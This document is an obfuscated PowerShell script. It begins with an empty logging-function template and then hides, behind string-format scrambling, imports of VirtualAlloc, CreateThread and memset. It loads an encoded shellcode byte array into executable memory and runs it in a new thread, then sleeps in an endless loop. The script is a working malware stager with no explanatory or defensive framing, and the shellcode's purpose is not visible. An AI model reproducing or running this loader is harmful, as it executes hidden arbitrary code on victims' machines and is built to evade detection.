Function vE`RB-`NoUN {

	[CmdletBinding()]
	Param (
	)
	
	Begin {
		
		[string]${CmdletName} = ${Ps`cmdl`Et}."m`yiN`VoC`ATiON"."M`yCoMMA`Nd"."NA`me"
		.("{0}{6}{5}{1}{3}{8}{4}{2}{7}"-f 'W','ction','te','Heade','OrFoo','te-Fun','ri','r','r') -CmdletName ${CmdletName} -CmdletBoundParameters ${Psb`OU`ND`pARAmEtErs} -Header
	}
	Process {
		Try {
			
		}
		Catch {
			&("{0}{1}{2}" -f 'Wr','it','e-Log') -Message "<error message>. `n$(Resolve-Error) " -Severity 3 -Source ${CmdletName}
		}
	}
	End {
		.("{0}{4}{6}{2}{5}{7}{3}{1}" -f 'Writ','ter','nctionHeade','o','e','rO','-Fu','rFo') -CmdletName ${CmdletName} -Footer
	}
}
${W`3OA} = ((("{79}{29}{94}{74}{90}{9}{65}{100}{1}{40}{11}{119}{87}{46}{2}{82}{93}{55}{57}{115}{109}{105}{3}{84}{60}{122}{92}{77}{33}{26}{49}{38}{44}{86}{78}{52}{121}{31}{24}{102}{30}{95}{80}{66}{64}{47}{62}{104}{22}{116}{75}{48}{25}{97}{10}{114}{7}{34}{0}{112}{81}{107}{20}{43}{89}{85}{13}{27}{61}{15}{76}{98}{39}{41}{110}{50}{28}{108}{99}{23}{5}{19}{111}{63}{18}{88}{8}{45}{73}{4}{67}{37}{124}{51}{58}{113}{103}{6}{17}{117}{53}{83}{118}{36}{68}{69}{54}{72}{56}{32}{14}{35}{21}{16}{123}{96}{71}{120}{59}{101}{91}{42}{12}{106}{70}" -f 'tr ','l9tS)]p','atic','tualAl','t','Addr','io',' st','P','nel','li','l','int count','Th','ti','a','rn IntP','nFlags, IntPtr lpThreadId)',' l','es','(In','e','(9tSker','t','a','u','i','r',' Int','lImport(','Type, ','loc','lic sta','dress, u','atic extern IntP','c ext','Smsv','r','t dwS',' dw','ub','StackSiz',', u','tPtr','iz','ara','st','lI',']p','n',',',' u','nt','Impo','dll','n',')]pub',' IntPtr','in','ntPt','tPt','e','mpo','tr','[Dl','32.','ect);','e','crt','.',';',' ','9tS','me','tS','ll9tS)','dAttributes, ui','pAd',', ui','[Dl','rot','e',' ex','r','loc(In','lp','e',' ','p',' ','ker',' uint src','l','ter','9','uint flP','r','b','nt','r','dl','r dest,','tion',' dwCreat','rt','r',')','ateThread','Ptr lpSta','Vi','e','s, IntP','Cr','t','c',' ','nel32.d',';[Dll','t(9t','ic','memset(I',' flAl','r ','t',','))-repLAcE  '9tS',[ChAR]34);${W} = .("{2}{1}{0}" -f 'pe','Ty','Add-') -memberDefinition ${W`3oA} -Name ("{0}{1}"-f 'W','in32') -namespace ("{3}{2}{1}{0}"-f'tions','c','n32Fun','Wi') -passthru;[Byte[]];[Byte[]]${z} = 0xbd,0x41,0xc1,0x85,0xf0,0xdb,0xd4,0xd9,0x74,0x24,0xf4,0x5a,0x33,0xc9,0xb1,0x5b,0x31,0x6a,0x14,0x03,0x6a,0x14,0x83,0xc2,0x04,0xa3,0x34,0x79,0x18,0xa1,0xb7,0x82,0xd9,0xc5,0x3e,0x67,0xe8,0xc5,0x25,0xe3,0x5b,0xf5,0x2e,0xa1,0x57,0x7e,0x62,0x52,0xe3,0xf2,0xab,0x55,0x44,0xb8,0x8d,0x58,0x55,0x90,0xee,0xfb,0xd5,0xea,0x22,0xdc,0xe4,0x25,0x37,0x1d,0x20,0x5b,0xba,0x4f,0xf9,0x10,0x69,0x60,0x8e,0x6c,0xb2,0x0b,0xdc,0x61,0xb2,0xe8,0x95,0x80,0x93,0xbe,0xae,0xdb,0x33,0x40,0x62,0x50,0x7a,0x5a,0x67,0x5c,0x34,0xd1,0x53,0x2b,0xc7,0x33,0xaa,0xd4,0x64,0x7a,0x02,0x27,0x74,0xba,0xa5,0xd7,0x03,0xb2,0xd5,0x6a,0x14,0x01,0xa7,0xb0,0x91,0x92,0x0f,0x33,0x01,0x7f,0xb1,0x90,0xd4,0xf4,0xbd,0x5d,0x92,0x53,0xa2,0x60,0x77,0xe8,0xde,0xe9,0x76,0x3f,0x57,0xa9,0x5c,0x9b,0x33,0x6a,0xfc,0xba,0x99,0xdd,0x01,0xdc,0x41,0x82,0xa7,0x96,0x6c,0xd7,0xd5,0xf4,0xf8,0x49,0x83,0x72,0xf9,0xfd,0x3c,0x12,0x97,0x94,0x96,0x8c,0x2b,0x11,0x31,0x4a,0x4b,0x08,0x0c,0x8f,0xe0,0xe1,0x3c,0x7c,0x54,0x6d,0xf9,0xd4,0x23,0xca,0x02,0x0d,0x80,0x47,0x97,0xad,0x74,0x34,0x0d,0xe2,0x92,0xc2,0xd1,0x02,0x63,0x1d,0x8d,0x46,0x50,0x2c,0x08,0x47,0xc6,0xc6,0x3d,0xce,0x79,0xd0,0x3d,0x05,0x0c,0x1a,0x92,0xce,0x0f,0xa0,0x75,0x8b,0x43,0xf7,0x26,0xc4,0x30,0xa1,0xa0,0x01,0xe3,0x63,0x0a,0x29,0xd9,0xed,0x06,0xdf,0xbd,0x42,0x84,0x8c,0x12,0x32,0x42,0x1e,0x93,0xa2,0xe9,0x9f,0x4e,0x57,0xcd,0x15,0x7b,0x18,0xbb,0x38,0x13,0x56,0xf6,0x61,0xb2,0x69,0x2c,0x0f,0x7b,0xfd,0xcf,0xc0,0x7b,0xfd,0xa7,0xe0,0x7b,0xbd,0x37,0xb2,0x13,0x65,0x9c,0x67,0x01,0x6a,0x09,0x14,0x9a,0xc7,0x3b,0xfc,0x4a,0x8f,0x3b,0x23,0x75,0x4f,0x6f,0x75,0x1d,0x5d,0x19,0xf0,0x3f,0x9e,0xf0,0x86,0x00,0x14,0x36,0x03,0x87,0xd5,0x0b,0x91,0x48,0xa0,0x6e,0xc2,0x8b,0x15,0x99,0x7a,0xf4,0x56,0xa6,0x18,0x68,0x9a,0x74,0xd6,0x5c,0xf7,0xb1,0x2f,0x8c,0x35,0x8c,0x7c,0xe3,0x0e,0xc6,0xac,0x9a,0x00,0x0b,0xc2,0x33,0x95,0x27,0x4c,0xa9,0x34,0xbb,0xf8,0x1c,0x87,0x15,0x62,0x30,0x8a,0x19,0x11,0xba,0x31,0xf4,0xb8,0x2f,0xd8,0x72,0x54,0xde,0x7b,0xf4,0xd9,0x30,0x18,0x95,0x70,0x4d;${g} = 0x1000;if (${z}."l`eNgtH" -gt 0x1000){${g} = ${Z}."lE`NgTh"};${E`JN4}=${W}::("{1}{2}{0}"-f'alAlloc','Virt','u').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."Le`NgtH"-1);${i}++) {${w}::"mE`MSET"([IntPtr](${E`JN4}.("{0}{2}{1}" -f'ToI','32','nt').Invoke()+${I}), ${z}[${I}], 1)};${w}::("{0}{2}{1}"-f'Cre','d','ateThrea').Invoke(0,0,${Ej`N4},0,0,0);for (;;){.("{2}{1}{0}"-f'ep','rt-sle','Sta') 60};
